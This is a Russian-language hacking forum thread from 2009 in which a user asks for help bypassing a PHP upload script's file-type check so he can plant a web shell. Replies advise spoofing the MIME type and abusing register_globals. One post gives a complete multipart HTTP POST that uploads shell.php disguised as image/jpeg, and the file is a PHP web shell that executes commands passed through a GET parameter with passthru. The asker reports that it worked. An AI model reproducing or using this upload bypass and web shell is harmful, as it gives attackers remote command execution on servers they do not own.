ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Помогите залить шелл (обойти $File_type)
  #1  
Старый 28.12.2009, 20:51
Аватар для vld2008
vld2008
Новичок
Регистрация: 30.11.2006
Сообщений: 8
Провел на форуме:
40842

Репутация: 1
По умолчанию Помогите залить шелл (обойти $File_type)

не актуально

Последний раз редактировалось vld2008; 30.12.2009 в 06:30..
 
Ответить с цитированием

  #2  
Старый 28.12.2009, 21:11
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Эм... Послать POST-запрос, но в передаваемых данных указать image/gif.
 
Ответить с цитированием

  #3  
Старый 29.12.2009, 12:28
Аватар для vld2008
vld2008
Новичок
Регистрация: 30.11.2006
Сообщений: 8
Провел на форуме:
40842

Репутация: 1
По умолчанию

можешь небольшой пример привести?
 
Ответить с цитированием

  #4  
Старый 29.12.2009, 12:56
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от vld2008  
можешь небольшой пример привести?
То что ты дал - это не рабочий скрипт.Если быть точнее,он рабочий,если он куда то инклудиться,где и обозначаються фигурируемые там переменные.Если же нет,то если на сервере register_globals = on, то просто задай переменным нужное значение,и золей шелл таким образом.Но мне чтото подсказывает,что это только часть кода.
 
Ответить с цитированием

  #5  
Старый 29.12.2009, 13:12
Аватар для vld2008
vld2008
Новичок
Регистрация: 30.11.2006
Сообщений: 8
Провел на форуме:
40842

Репутация: 1
По умолчанию

Хоть это и часть кода, он прекрасно заливает файлы (register_globals - ON, включены).
Если добавить
Цитата:
?d=/ПОЛНЫЙ ПУТЬ К ДИРЕКТОРИИ ДЛЯ ЗАЛИВКИ ФАЙЛА
в запросе к нему. Но вот именно обойти тип файла для заливки не могу. Попробуйте у себя его запустить

Последний раз редактировалось vld2008; 29.12.2009 в 14:39..
 
Ответить с цитированием

  #6  
Старый 29.12.2009, 13:19
Аватар для krypt3r
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Цитата:
можешь небольшой пример привести?
Если расширение не проверяется, то можно заюзать что-нибудь типа такого запроса
Код:
POST http://127.0.0.1/upload/ HTTP/1.1
Host: localhost
Referer: http://127.0.0.1/index.php
Cookie: PHPSESSID=$session_id
Content-Length: 1024
Content-Type: multipart/form-data; boundary="6G+f"

--6G+f
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
--6G+f
Content-Disposition: form-data; name="uploaded"; filename="shell.php"
Content-Type: image/jpeg

<?php
  if (isset ($_GET['id']) && !empty ($_GET['id']))
    passthru ($_GET['id']);
  else
    echo "Empty";
?>
--6G+f
Content-Disposition: form-data; name="Upload"

Upload
--6G+f--
 
Ответить с цитированием

  #7  
Старый 29.12.2009, 14:33
Аватар для vld2008
vld2008
Новичок
Регистрация: 30.11.2006
Сообщений: 8
Провел на форуме:
40842

Репутация: 1
По умолчанию

Йухуу, есть такое дело
Спасибо, krypt3r
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите залить шелл niva622 Болталка 3 14.02.2009 00:17
Помогите залить шелл на phpBB 2.0.21 ! XXL Разное - Покупка, продажа, обмен 3 19.07.2006 12:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ